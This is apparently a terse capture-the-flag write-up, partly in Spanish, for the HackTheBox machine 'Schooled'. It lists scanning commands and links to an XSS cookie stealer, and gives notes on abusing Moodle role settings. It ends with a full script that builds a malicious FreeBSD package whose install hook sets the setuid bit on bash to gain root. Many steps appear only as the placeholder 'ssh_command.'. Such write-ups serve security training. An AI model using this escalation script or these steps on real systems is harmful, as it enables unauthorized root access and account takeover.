Schooled

Schooled


HTB Linux

echo “10.129.170.50 schooled.htb www.schooled.htb” | sudo tee -a /etc/hosts

nmap -A -p- -oA schooled 10.129.170.50 —min-rate=10000 —script=vuln —script-timeout=15 -v

ssh_command.

nmap -sC -sV -O -p- -oA schooled 10.129.170.50

nmap -sU -O -p- -oA schooled-udp 10.129.170.50

nikto -h 10.129.170.50:80

gobuster dir -k -u http://10.129.170.50/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

ssh_command.

ssh_command.

wfuzz -c -u “http://schooled.htb/” -H “Host:FUZZ.schooled.htb” -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt —hl 461

Agregamos moodle.schooled.htb a etc/hosts

ssh_command.

Jamie Borham

Lianne Carter

Jane Higgins

Manuel Phillips

ssh_command.

ssh_command.

Me meto en matematicas y le doy click a enroll me

ssh_command.

ssh_command.

ssh_command.

ssh_command.

https://github.com/s0wr0b1ndef/WebHacking101/blob/master/xss-reflected-steal-cookie.md

https://raw.githubusercontent.com/lnxg33k/misc/master/XSS-cookie-stealer.py

ssh_command.

ssh_command.

ssh_command.

No me sirvio. PUse esto en el moodlenet textbox

ssh_command.

ssh_command.

cambiar userlist a 24 y roletoassign a 1

ssh_command.

ssh_command.

metemos a lian carter como estudiante

le damos click a lian carter y log in as

ssh_command.

vamos a define roles

ssh_command.

ssh_command.

#!/bin/sh

STAGEDIR=~/stage

rm -rf ${STAGEDIR}

mkdir -p ${STAGEDIR}

cat >> ${STAGEDIR}/+PRE_DEINSTALL <<EOF

careful here, this may clobber your system

echo “Resetting root shell”

pw usermod -n root -s /bin/sh

EOF

cat >> ${STAGEDIR}/+POST_INSTALL <<EOF

careful here, this may clobber your system

echo “Registering root shell”

chmod +s /usr/local/bin/bash

EOF

cat >> ${STAGEDIR}/+MANIFEST <<EOF

name: mypackage

version: “1.0_5”

origin: sysutils/mypackage

comment: “automates stuff”

desc: “automates tasks which can also be undone later”

maintainer: john@doe.it

www: https://doe.it

prefix: /

EOF

mkdir -p ${STAGEDIR}/usr/local/etc

echo ”# hello world” > ${STAGEDIR}/usr/local/etc/my.conf

echo “/usr/local/etc/my.conf” > ${STAGEDIR}/plist

pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -p ${STAGEDIR}/plist -o .

ssh_command.

© 2025 Cu3rv0x